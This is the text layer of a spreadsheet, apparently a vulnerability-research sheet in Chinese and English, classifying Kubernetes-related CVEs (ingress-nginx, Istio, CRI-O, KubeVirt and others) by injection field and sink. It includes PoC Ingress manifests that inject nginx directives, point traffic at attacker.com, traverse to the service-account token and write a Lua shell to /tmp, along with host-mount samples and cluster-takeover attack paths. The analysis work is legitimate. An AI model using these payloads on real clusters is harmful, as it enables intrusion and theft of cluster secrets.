  <si>
    <t>CVE-2021-27099</t>
  </si>
  <si>
    <t xml:space="preserve">
在SPIRE 0.8.5、0.9.4、0.10.2、0.11.3及0.12.1之前的版本中，"aws_iid"节点验证器未正确规范化通过代理ID模板功能提供的路径。若攻击者在验证前控制了EC2标签值，且验证器被配置为使用标签值作为路径末级元素的代理ID模板方案，则可能导致攻击者在同一信任域内签发任意SPIFFE ID。该漏洞已在SPIRE 0.11.3和0.12.1版本中修复。</t>
  </si>
  <si>
    <t>**攻击面**: 使用SPIRE进行节点身份认证的Kubernetes集群（尤其是AWS EC2环境），攻击者可控制EC2实例标签的恶意用户。</t>
  </si>
  <si>
    <t>**利用方式**:  
   - 在EC2实例启动前篡改其标签值  
   - 利用SPIRE的agent ID模板（如`{{ .Tag.my_tag }}`）路径规范漏洞  
   - 伪造SPIFFE ID获取非法身份凭证</t>
  </si>
  <si>
    <t>In SPIRE before versions 0.8.5, 0.9.4, 0.10.2, 0.11.3 and 0.12.1, the "aws_iid" Node Attestor improperly normalizes the path provided through the agent ID templating feature, which may allow the issuance of an arbitrary SPIFFE ID within the same trust domain, if the attacker controls the value of an EC2 tag prior to attestation, and the attestor is configured for agent ID templating where the tag value is the last element in the path. This issue has been fixed in SPIRE versions 0.11.3 and 0.12.1</t>
  </si>
  <si>
    <t>CVE-2025-1097</t>
  </si>
  <si>
    <t xml:space="preserve">
在 ingress-nginx（https://github.com/kubernetes/ingress-nginx）中发现一个安全漏洞，攻击者可利用`auth-tls-match-cn` Ingress注解将恶意配置注入nginx。该漏洞可能导致在ingress-nginx控制器的上下文中执行任意代码，并泄露控制器可访问的Secret（需注意在默认安装配置下，控制器可访问集群范围内的所有Secret）。</t>
  </si>
  <si>
    <t>**攻击面/影响范围**  
- 攻击者需具有`Ingress`资源创建/更新权限（RBAC控制不当场景）  
- 影响所有使用`auth-tls-match-cn`注解的ingress-nginx实例（&lt;=修复版本）</t>
  </si>
  <si>
    <t>**攻击利用方式**  
- 通过构造恶意注解值注入nginx配置指令（如`set_by_lua_block`等）  
- 利用nginx动态加载特性执行任意Lua代码或Shell命令  
- 窃取ingress-nginx ServiceAccount绑定的Secrets（默认含集群级权限）</t>
  </si>
  <si>
    <t>apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: malicious-ingress
  annotations:
    nginx.ingress.kubernetes.io/auth-tls-match-cn: "on; $(恶意命令注入)"
spec:
  ingressClassName: nginx
  rules:
  - host: example.com
    http:
      paths:
      - path: /
        pathType: Prefix
        backend:
          service:
            name: dummy-service
            port: 
              number: 80</t>
  </si>
  <si>
    <t>VE-2025-1097 漏洞以 Ingress-NGINX 控制器中的 auth-tls-match-cn 注释为目标，该注释旨在通过将所提供证书的公用名 （CN） 字段与指定值进行匹配来强制执行客户端证书身份验证。NGINX 控制器会尝试验证此注释的值是否以前缀 CN= 开头，以及其余部分是否为有效的正则表达式。但是，此验证不够强大，无法防止攻击者注入恶意内容。通过仔细制作 annotation 值以满足肤浅的检查，攻击者可以将任意 NGINX 配置指令注入控制器生成和测试的最终配置文件中。</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">漏洞poc: https://github.com/sandumjacob/IngressNightmare-POCs
攻击路径：
1. 发现暴露的准入控制器
攻击者通过扫描 Pod 网络或利用内部网络权限，发现 </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">ingress-nginx Validating Admission Controller 的 HTTP 端点未正确隔离且允许外部访问（默认仅限集群内部通信，但实际部署常因网络策略不当而暴露）。
2, 注入恶意 NGINX 配置
通过构造包含特定注解（如 mirror-host、auth-url）的 </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">AdmissionReview 请求，攻击者诱导准入控制器生成含危险指令的 NGINX 配置文件（例如注入 load_module /path/to/malicious.so），利用 nginx -t 配置验证阶段触发代码执行。
3. 窃取集群机密与权限提升
利用代码执行能力读取 </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>**/var/run/secrets/kubernetes.io/serviceaccount/token**</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">（服务账户令牌），获取控制器 Pod 的高权限身份；
通过该身份访问 </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>Kubernetes Secrets</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">（默认权限可跨命名空间读取所有 Secrets），窃取数据库凭据、API 密钥等敏感数据。
4. 横向移动与集群接管
使用窃取的凭据创建恶意 Pod 或修改现有工作负载，部署后门；
劫持 Ingress 流量至攻击者控制的服务器，实施数据篡改或勒索；
最终通过 </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>cluster-admin 权限完全控制 Kubernetes 集群</t>
    </r>
  </si>
  <si>
    <t>信任边界发生变化-集群内部到外部</t>
  </si>
  <si>
    <t>CVE-2025-1098</t>
  </si>
  <si>
    <t xml:space="preserve">
在 ingress-nginx（https://github.com/kubernetes/ingress-nginx）中发现一个安全问题，其中`mirror-target`和`mirror-host` Ingress注解可被用于向nginx注入任意配置。这可能导致在ingress-nginx控制器上下文中执行任意代码，并泄露控制器可访问的Secret（需注意在默认安装配置中，控制器可访问集群范围内的所有Secret）。</t>
  </si>
  <si>
    <t>**攻击面/影响范围**:  
   - 允许创建/修改Ingress资源的用户（包括被劫持的ServiceAccount）。  
   - 默认安装下，控制器可访问集群内所有Secrets（包括kube-system中的敏感数据）。</t>
  </si>
  <si>
    <t>**攻击方式**:  
   - 攻击者创建恶意Ingress，注入反向代理配置，劫持集群内部流量（如访问API Server）。  
   - 通过注入`proxy_pass`指令读取Secrets或执行特权Pod命令。</t>
  </si>
  <si>
    <t>apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: evil-ingress
  annotations:
    nginx.ingress.kubernetes.io/mirror-target: "http://attacker.com"
spec:
  uid: ";\nproxy_pass http://attacker.com; #"</t>
  </si>
  <si>
    <t>apiVersion: networking.k8s.io/v1
   kind: Ingress
   metadata:
     name: malicious-ingress
     annotations:
       nginx.ingress.kubernetes.io/mirror-target: "http://attacker-controlled.com$request_uri"
       nginx.ingress.kubernetes.io/mirror-host: "attacker.internal; proxy_pass http://kube-api-server:6443;"
   spec:
     rules:
     - host: example.com
       http:
         paths:
         - path: /
           pathType: Prefix
           backend:
             service:
               name: dummy-service
               port:
                 number: 80</t>
  </si>
  <si>
    <t>CVE-2025-1098 漏洞利用了 Ingress-NGINX 控制器处理 Ingress 资源的 metadata.uid 字段的方式。在 Kubernetes 中，uid 通常是自动分配给每个资源的唯一标识符，用户通常不会直接作它。但是，在准入控制器的上下文中，攻击者可以制作一个虚假的 AdmissionReview 请求，在该请求中，他们完全控制了 uid 值。
在易受攻击的 Ingress NGINX 应用程序中，在呈现临时配置文件进行验证的过程中，uid 值会未经过清理地传递到 NGINX 配置模板中。具体来说，uid 作为 mirror 模块的一部分嵌入到 NGINX 配置中，该模块旨在复制请求以进行调试或分析。由于此 uid 字段不被视为典型的用户提供的注释，因此它绕过了应用于注释的通常输入验证和正则表达式检查。因此，它成为攻击者可以完全控制的新注入点。
对 Ingress-NGINX 准入控制器具有网络访问权限的攻击者可以构建包含专门设计的 uid 值的恶意 AdmissionReview 请求。通过在 uid 中插入换行符或 NGINX 指令，攻击者可以跳出预期的配置上下文，将任意 NGINX 指令直接注入临时配置文件。由于控制器对此文件运行 nginx -t 测试，因此这些注入的指令由 NGINX 进程解析和执行。</t>
  </si>
  <si>
    <t>CVE-2025-24514</t>
  </si>
  <si>
    <t xml:space="preserve">
在ingress-nginx（https://github.com/kubernetes/ingress-nginx）中发现一个安全问题，其中`auth-url` Ingress注解可被用于向nginx注入配置。这可能导致在ingress-nginx控制器上下文中执行任意代码，并泄露控制器可访问的Secret（需注意的是，在默认安装配置下，该控制器可访问集群范围内的所有Secret）。</t>
  </si>
  <si>
    <t>**攻击面/影响范围**：  
   - 攻击者需具有`Ingress`资源的创建/更新权限（RBAC权限控制不足时）。  
   - 影响所有使用未修复版本`ingress-nginx`的集群（默认安装下控制器拥有集群级Secret访问权）。</t>
  </si>
  <si>
    <t>**利用方式**：  
   - 通过`auth-url`注入Shell命令或Nginx指令（如`$host`变量滥用），绕过输入验证。  
   - 恶意配置触发控制器生成含危险指令的`nginx.conf`，执行任意代码或泄露Secret。</t>
  </si>
  <si>
    <t>apiVersion: networking.k8s.io/v1
     kind: Ingress
     metadata:
       name: malicious-ingress
       annotations:
         nginx.ingress.kubernetes.io/auth-url: 'http://attacker.com/auth$(echo "恶意代码")'
     spec:
       ingressClassName: nginx
       rules:
       - host: example.com
         http:
           paths:
           - path: /
             pathType: Prefix
             backend:
               service:
                 name: dummy-service
                 port:
                   number: 80</t>
  </si>
  <si>
    <t>CVE-2025-24514 漏洞针对 Ingress-NGINX 控制器处理 auth-url 注释的方式，该注释用于定义外部 URL 以进行身份验证。此注释旨在指向一个外部服务，该服务在允许访问后端应用程序之前验证传入请求。但是，缺陷在于控制器如何获取此注释的值并将其直接嵌入到生成的 NGINX 配置中，而无需进行适当的清理。当创建或修改 Ingress 资源时，Ingress-NGINX 的准入控制器会通过渲染临时 NGINX 配置文件并运行 nginx -t test 命令来验证配置。在此过程中，auth-url 注释中提供的值将插入到配置模板中。如果输入未正确检查或转义，攻击者可以将换行符或恶意 NGINX 指令注入到注释值中。然后，这些注入的指令在 NGINX 二进制文件的验证阶段进行处理。</t>
  </si>
  <si>
    <t>CVE-2025-24513</t>
  </si>
  <si>
    <t xml:space="preserve">
在ingress-nginx（https://github.com/kubernetes/ingress-nginx）中发现一个安全漏洞，攻击者通过ingress-nginx准入控制器功能将恶意构造的数据注入文件名，导致容器内发生目录遍历。该漏洞可能造成拒绝服务攻击，或当结合其他漏洞时，可能有限泄露集群中的"Secret"对象。</t>
  </si>
  <si>
    <t>**攻击面**: 攻击者通过创建/更新Ingress资源触发Admission Controller的文件操作逻辑</t>
  </si>
  <si>
    <t>**利用方式**:  
   - 构造包含`../`的路径字段  
   - 覆盖容器内敏感文件（如配置文件）或创建指向Secret挂载路径的符号链接</t>
  </si>
  <si>
    <t xml:space="preserve">
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: exploit-ingress
  annotations:
    nginx.ingress.kubernetes.io/auth-type: basic  # 启用 Basic 认证
    nginx.ingress.kubernetes.io/auth-secret: "test"
  uid: "../../var/run/secrets/kubernetes.io/serviceaccount/token"  # 强制覆盖 UID（需绕过 Kubernetes 限制）
spec:
  ingressClassName: nginx
  rules:
  - host: "attacker.com"
    http:
      paths:
      - path: /
        pathType: Prefix
        backend:
          service:
            name: dummy-service
            port:
              number: 80</t>
  </si>
  <si>
    <t>apiVersion: networking.k8s.io/v1
   kind: Ingress
   metadata:
     name: malicious-ingress
     annotations:
       nginx.ingress.kubernetes.io/admission-control: "true"
   spec:
     rules:
     - http:
         paths:
         - path: /../../tmp/exploit
           pathType: ImplementationSpecific
           backend:
             service:
               name: dummy
               port: 
                 number: 80</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">漏洞poc: https://github.com/sandumjacob/IngressNightmare-POCs
攻击路径：
1. 发现暴露的准入控制器
攻击者通过扫描 Pod 网络或利用内部网络权限，发现 </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">ingress-nginx Validating Admission Controller 的 HTTP 端点未正确隔离且允许外部访问（默认仅限集群内部通信，但实际部署常因网络策略不当而暴露）。
2, 注入恶意 NGINX 配置
通过构造包含特定注解（如 mirror-host、auth-url）的 </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">AdmissionReview 请求，攻击者诱导准入控制器生成含危险指令的 NGINX 配置文件（例如注入 load_module /path/to/malicious.so），利用 nginx -t 配置验证阶段触发代码执行。
3. 窃取集群机密与权限提升
利用代码执行能力读取 </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>**/var/run/secrets/kubernetes.io/serviceaccount/token**</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">（服务账户令牌），获取控制器 Pod 的高权限身份；
通过该身份访问 </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>Kubernetes Secrets</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">（默认权限可跨命名空间读取所有 Secrets），窃取数据库凭据、API 密钥等敏感数据。
4. 横向移动与集群接管
使用窃取的凭据创建恶意 Pod 或修改现有工作负载，部署后门；
劫持 Ingress 流量至攻击者控制的服务器，实施数据篡改或勒索；
最终通过 </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">cluster-admin 权限完全控制 Kubernetes 集群
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>敏感文件泄露
控制器尝试读取目标 Token 文件，若文件内容符合 user:password 格式，会将其写入日志或返回错误信息，攻击者可通过日志获取 Token。</t>
    </r>
  </si>
  <si>
    <t>CVE</t>
  </si>
  <si>
    <t>漏洞描述</t>
  </si>
  <si>
    <t>多个字段可利用但原因一致</t>
  </si>
  <si>
    <t>字段之间配合使用</t>
  </si>
  <si>
    <t>涉及的资源个数</t>
  </si>
  <si>
    <t>CRD资源与内置资源之间的关系</t>
  </si>
  <si>
    <t>字段功能-统计</t>
  </si>
  <si>
    <t>字段详细分析</t>
  </si>
  <si>
    <t>是否涉及跨组件</t>
  </si>
  <si>
    <t>漏洞触发涉及的资源控制器的个数</t>
  </si>
  <si>
    <t>漏洞触发涉及的具体组件的详细信息</t>
  </si>
  <si>
    <t>涉及的组件间通信的方式</t>
  </si>
  <si>
    <t>关键操作类别</t>
  </si>
  <si>
    <t>具体的sink点的位置</t>
  </si>
  <si>
    <t>存在多条传播路径时以最长的传播路径进行统计</t>
  </si>
  <si>
    <t>A security issue was discovered in ingress-nginx where an actor with permission to create Ingress objects (in the `networking.k8s.io` or `extensions` API group) can bypass annotation validation to inject arbitrary commands and obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster.</t>
  </si>
  <si>
    <t>功能一致</t>
  </si>
  <si>
    <t>命令执行</t>
  </si>
  <si>
    <t>socket</t>
  </si>
  <si>
    <t>配置注入-&gt;命令执行</t>
  </si>
  <si>
    <t>配置生成-&gt;
sink点在nginx.conf上，最终由nginx执行代码</t>
  </si>
  <si>
    <t>1. ingress.kubernetes.io/server-snippet：
调用深度：3
getConfiguration-&gt;getBackendServers-&gt;createServers-&gt; locationApplyAnnotations
2. nginx.ingress.kubernetes.io/auth-tls-verify-client
调用深度：2
getConfiguration-&gt;getBackendServers-&gt;locationApplyAnnotations</t>
  </si>
  <si>
    <t>Ingress-nginx `path` sanitization can be bypassed with `log_format` directive.</t>
  </si>
  <si>
    <t>apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: webexp
spec:
  rules:
    - host: "example.com"
      http:
        paths:
          - path: "/x/ {\n
            }\n
          }\n
          log_format exploit escape=none $http_x_ginoah;\n
          server {\n
            server_name x.x;\n
            listen 80;\n
            listen [::]:80;\n
            location /z/ {\n
                access_log /tmp/luashell exploit;\n
            }\n
            location /x/ {\n
          #"
            pathType: Exact
            backend:
              service:
                name: not-exist-service
                port:
                  number: 8080</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: webexp
spec:
  rules:
    - host: "example.com"
      http:
       </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> paths:
          - path: "/x/ {\n
            }\n
          }\n
        </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  log_format exploit escape=none $http_x_ginoah;\n
          server {\n
            server_name x.x;\n
            listen 80;\n
            listen [::]:80;\n
            location /z/ {\n
                access_log /tmp/luashell exploit;\n  # Write a malicious lua config to /tmp/luashell 通过外部文件进行注入
            }\n
            location /x/ {\n
          #"</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
            pathType: Exact
            backend:
              service:
                name: not-exist-service
                port:
                  number: 8080</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
Ingress 的 path 字段被注入 nginx 配置
通过换行和闭合花括号逃逸出原配置块
注入自定义的 log_format 和 server 配置
利用 access_log 将 HTTP header 内容写入任意文件
进一步的横向移动方式：
1.Find another service account with cluster admin permissions
2.Find another service account with node permissions to patch kubelet config；
3.Find another service account with pod permissions to create/patch a privileged pod, then escape to the control-plane node
https://hackerone.com/reports/1620702#activity-17418760（ 有详细的后续横向移动的攻击过程）</t>
    </r>
  </si>
  <si>
    <t>涉及的注入字段本身是用于定义HTTP请求的路径匹配规则，但可通过在路径字段中注入NGINX配置语法
利用换行符(\n)和大括号({})破坏原有配置结构
插入恶意的server块和location块
通过access_log指令将恶意内容写入文件</t>
  </si>
  <si>
    <t xml:space="preserve">
调用深度：2
getConfiguration-&gt;getBackendServers
调用深度：3
getConfiguration-&gt;getBackendServers-&gt;createServers
</t>
  </si>
  <si>
    <t>涉及的注入字段本身是用于定义HTTP请求的路径匹配规则，但可通过在路径字段中注入 \n 配置格式来绕过\s*root\s*.* 的正则表达式检查，从而允许攻击者可以读取任意文件</t>
  </si>
  <si>
    <t>配置注入-&gt;网络策略配置生成</t>
  </si>
  <si>
    <t>配置生成-&gt;
sink点在nginx.conf上,攻击者注入恶意的路径配置</t>
  </si>
  <si>
    <t xml:space="preserve">
调用深度：2
getConfiguration-&gt;getBackendServers
调用深度:3
getConfiguration-&gt;getBackendServers-&gt;createServers
</t>
  </si>
  <si>
    <t>Ingress nginx annotation injection causes arbitrary command execution.</t>
  </si>
  <si>
    <t>或-&gt; snippet 类注解</t>
  </si>
  <si>
    <t>sink点在nginx.conf上，最终由nginx执行代码</t>
  </si>
  <si>
    <t>Code injection via nginx.ingress.kubernetes.io/permanent-redirect annotation.</t>
  </si>
  <si>
    <t>A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use .metadata.annotations in an Ingress object (in the networking.k8s.io or extensions API group) to obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster.</t>
  </si>
  <si>
    <t>应用特定功能的字段</t>
  </si>
  <si>
    <t>NGINX Ingress Controller特有的annotation
用于设置HTTP Connection头部
原始设计用途：控制HTTP连接行为
正常用法："keep-alive" 或 "close"
提供NGINX特定的代理头部配置能力</t>
  </si>
  <si>
    <t>A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use the spec.rules[].http.paths[].path field of an Ingress object (in the networking.k8s.io or extensions API group) to obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster.</t>
  </si>
  <si>
    <t>A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use the custom snippets feature to obtain all secrets in the cluster.</t>
  </si>
  <si>
    <t xml:space="preserve">或（ 存在多个字段可进行利用，但原因一致，没有限制\n字符的使用）
</t>
  </si>
  <si>
    <t>Istio is an open platform to connect, manage, and secure microservices. In versions 1.12.0 and 1.12.1 Istio is vulnerable to a privilege escalation attack. Users who have `CREATE` permission for `gateways.gateway.networking.k8s.io` objects can escalate this privilege to create other resources that they may not have access to, such as `Pod`. This vulnerability impacts only an Alpha level feature, the Kubernetes Gateway API. This is not the same as the Istio Gateway type (gateways.networking.istio.io), which is not vulnerable. Users are advised to upgrade to resolve this issue. Users unable to upgrade should implement any of the following which will prevent this vulnerability: Remove the gateways.gateway.networking.k8s.io CustomResourceDefinition, set PILOT_ENABLE_GATEWAY_API_DEPLOYMENT_CONTROLLER=true environment variable in Istiod, or remove CREATE permissions for gateways.gateway.networking.k8s.io objects from untrusted users.</t>
  </si>
  <si>
    <t>https://paper.seebug.org/1859/（ 比较复杂的漏洞利用流程-&gt; 利用的是
下面3个文章利用的都是networking.istio.io/service-type 的注入点
https://www.anquanke.com/post/id/272528（Go template 遇上 yaml 反序列化 CVE-2022-21701 分析）-&gt; 使用service.yaml模版中的networking.istio.io/service-type 
https://paper.seebug.org/1882/（ 上述文章对应的seebug上的文章-&gt; lazydog写的）
https://lf.lc/cve/cve-2022-21701/（ 使用的是networking.istio.io/service-type 的注入点）</t>
  </si>
  <si>
    <t xml:space="preserve">或（ 第二种注入方式可能不属于这个漏洞）
涉及多种注入方式，因为gateway转化为service 和Pod资源的对应模版有多个目标注入点。
注入点包括：networking.istio.io/service-type 
和
inject.istio.io/templates: sidecar
    sidecar.istio.io/proxyImage: docker.io/shtesla/proxyv2:malicious
    sidecar.istio.io/userVolume: '[{"name":"kubernetes-dir","hostPath": {"path":"/etc/kubernetes","type":"Directory"}}]'
    sidecar.istio.io/userVolumeMount: '[{"mountPath":"/tmp/test","name":"kubernetes-dir"}]'
</t>
  </si>
  <si>
    <t>gateway</t>
  </si>
  <si>
    <t>istio-gateway资源控制器会根据此字段来渲染模版从而生成对应的service 资源（其他的service mesh类别的应用可能有相似的漏洞）</t>
  </si>
  <si>
    <t>istio gateway 控制器、K8s api-server</t>
  </si>
  <si>
    <t>RPC-http（Kubernetes API 是基于 HTTP 协议实现的 RPC 风格的 REST API。）</t>
  </si>
  <si>
    <t>K8s api 读写操作</t>
  </si>
  <si>
    <t>service 模版注入-&gt; k8s api 创建资源</t>
  </si>
  <si>
    <t>或 
org.systemd.property.* 涉及多个属性</t>
  </si>
  <si>
    <t>pod</t>
  </si>
  <si>
    <t>工作负载</t>
  </si>
  <si>
    <t>应用特定功能的字段：
底层操作系统属性（其他容器运行时的cri-server实现可能有类似的问题）</t>
  </si>
  <si>
    <t xml:space="preserve">kubelet-&gt; cri-o-runc </t>
  </si>
  <si>
    <t>RPC- 容器标准 运行时接口CRI对应的RPC实现</t>
  </si>
  <si>
    <t>命令执行
配置注入-&gt; 生成系统配置( 更改底层Linux系统属性）</t>
  </si>
  <si>
    <t>配置注入（OCI配置）-&gt; 底层runc解析并进行命令执行</t>
  </si>
  <si>
    <t xml:space="preserve">或
可通过两种方式来触发来进行pod exec的命令行执行
Pod.Spec.Containers.lifecycle.preStop.exec.command
Pod.Spec.Containers.lifecycle.postStart.exec.command
</t>
  </si>
  <si>
    <t>命令执行-&gt;文件I/O</t>
  </si>
  <si>
    <t>cri-o 执行命令后将对应输出存储实际的文件</t>
  </si>
  <si>
    <t>Fluid is an open source Kubernetes-native Distributed Dataset Orchestrator and Accelerator for data-intensive applications. An OS command injection vulnerability within the Fluid project's JuicefsRuntime can potentially allow an authenticated user, who has the authority to create or update the K8s CRD Dataset/JuicefsRuntime, to execute arbitrary OS commands within the juicefs related containers. This could lead to unauthorized access, modification or deletion of data. Users who're using versions &lt; 0.9.3 with JuicefsRuntime should upgrade to v0.9.3.</t>
  </si>
  <si>
    <t>或（典型示例-&gt; 存在多个可注入的字段）</t>
  </si>
  <si>
    <t>Dataset 或者 JuicefsRuntime</t>
  </si>
  <si>
    <t>多个字段可以流向同一注入位置（ 命令注入）</t>
  </si>
  <si>
    <t>直接命令行参数拼接注入</t>
  </si>
  <si>
    <t>containerd is an open source container runtime. A bug was found in the containerd's CRI implementation where programs inside a container can cause the containerd daemon to consume memory without bound during invocation of the `ExecSync` API. This can cause containerd to consume all available memory on the computer, denying service to other legitimate workloads. Kubernetes and crictl can both be configured to use containerd's CRI implementation; `ExecSync` may be used when running probes or when executing processes via an "exec" facility. This bug has been fixed in containerd 1.6.6 and 1.5.13. Users should update to these versions to resolve the issue. Users unable to upgrade should ensure that only trusted images and commands are used.</t>
  </si>
  <si>
    <t>kubelet-&gt; cri-o-&gt;containerd</t>
  </si>
  <si>
    <t>Cilium is a networking, observability, and security solution with an eBPF-based dataplane. An attacker with the ability to update pod labels can cause Cilium to apply incorrect network policies. This issue arises due to the fact that on pod update, Cilium incorrectly uses user-provided pod labels to select the policies which apply to the workload in question. This can affect Cilium network policies that use the namespace, service account or cluster constructs to restrict traffic, Cilium clusterwide network policies that use Cilium namespace labels to select the Pod and Kubernetes network policies. Non-existent construct names can be provided, which bypass all network policies applicable to the construct. For example, providing a pod with a non-existent namespace as the value of the `io.kubernetes.pod.namespace` label results in none of the namespaced CiliumNetworkPolicies applying to the pod in question. This attack requires the attacker to have Kubernetes API Server access, as described in the Cilium Threat Model. This issue has been resolved in: Cilium versions 1.14.2, 1.13.7, and 1.12.14. Users are advised to upgrade. As a workaround an admission webhook can be used to prevent pod label updates to the `k8s:io.kubernetes.pod.namespace` and `io.cilium.k8s.policy.*` keys.</t>
  </si>
  <si>
    <t>Contour is a Kubernetes ingress controller using Envoy proxy. In Contour before version 1.17.1 a specially crafted ExternalName type Service may be used to access Envoy's admin interface, which Contour normally prevents from access outside the Envoy container. This can be used to shut down Envoy remotely (a denial of service), or to expose the existence of any Secret that Envoy is using for its configuration, including most notably TLS Keypairs. However, it *cannot* be used to get the *content* of those secrets. Since this attack allows access to the administration interface, a variety of administration options are available, such as shutting down the Envoy or draining traffic. In general, the Envoy admin interface cannot easily be used for making changes to the cluster, in-flight requests, or backend services, but it could be used to shut down or drain Envoy, change traffic routing, or to retrieve secret metadata, as mentioned above. The issue will be addressed in Contour v1.18.0 and a cherry-picked patch release, v1.17.1, has been released to cover users who cannot upgrade at this time. For more details refer to the linked GitHub Security Advisory.</t>
  </si>
  <si>
    <t>service</t>
  </si>
  <si>
    <t>A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/&lt;&gt; is not accessible.</t>
  </si>
  <si>
    <t>VirtualMachineInstance</t>
  </si>
  <si>
    <t>目录挂载</t>
  </si>
  <si>
    <t>与-&gt; 攻击者创建挂载`hostDisk`存储卷类型的资源VirtualMachineInstance
---
apiVersion: kubevirt.io/v1alpha3
     kind: VirtualMachineInstance
     metadata:
       name: malicious-vmi
     spec:
       domain:
         devices:
           disks:
           - name: host-root
             hostDisk:
               path: /
               type: DirectoryOrCreate  # 恶意挂载宿主机根目录</t>
  </si>
  <si>
